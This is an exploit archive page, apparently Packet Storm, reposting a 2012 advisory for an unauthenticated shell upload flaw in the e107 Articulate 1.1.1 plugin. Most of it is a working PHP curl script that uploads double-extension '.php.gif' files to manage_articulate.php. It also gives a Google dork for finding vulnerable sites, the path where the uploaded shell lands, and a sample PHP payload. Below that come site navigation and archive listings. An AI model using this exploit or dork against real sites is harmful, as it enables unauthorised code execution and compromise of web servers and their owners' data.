e107 Articulate 1.1.1 Shell Upload

e107 Articulate 1.1.1 Shell Upload: Posted Jun 23, 2012; Authored by Sammy FORGIT; e107 Articulate third party module version 1.1.1 suffers from an unauthenticated remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 41b99ecb1b11992f69a368336dd53421e432b6e6aac49f238f066819b66025b8; Download | Favorite | View

e107 Articulate 1.1.1 Shell Upload

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : e107 plugins - Articulate Arbitrary File Upload Vulnerability
# Version : 1.1.1
# link : http://e107.org/e107_plugins/psilo/list.php?mode=plugin&cat=0&id=174
# Software : http://e107.org/e107_plugins/psilo/psilo.php?download.174
# Date : 19-06-2012
# Google Dork : inurl:/e107_plugins/articulate
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

<?php

$uploadfile="lo.php.gif";
$uploadfile2="db.php.gif";

$ch = curl_init("http://www.exemple.com/e107/e107_plugins/articulate/manage_articulate.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file_articulatepic[1]'=>"@$uploadfile",
                      'file_articulatepic[2]'=>"@$uploadfile2",
                      'articulate_action'=>'update'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

Shell Access : http://www.exemple.com/e107/e107_plugins/articulate/pictures/ _lo.php.gif _db.php.gif

lo.php.gif
<?php
phpinfo();
?>


# Site : 1337day.com Inj3ct0r Exploit Database

Top Authors In Last 30 Days

Red Hat 276 files
Ubuntu 65 files
Debian 25 files
Gentoo 16 files
LiquidWorm 10 files
nu11secur1ty 5 files
kai6u 3 files
Adam Gowdiak 3 files
liquidsky 3 files
gabe_k 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,028)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,483)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,509)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,710)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,395)
UnixWare (187)
Windows (6,653)
Other

e107 Articulate 1.1.1 Shell Upload

e107 Articulate 1.1.1 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

e107 Articulate 1.1.1 Shell Upload

Share This

e107 Articulate 1.1.1 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems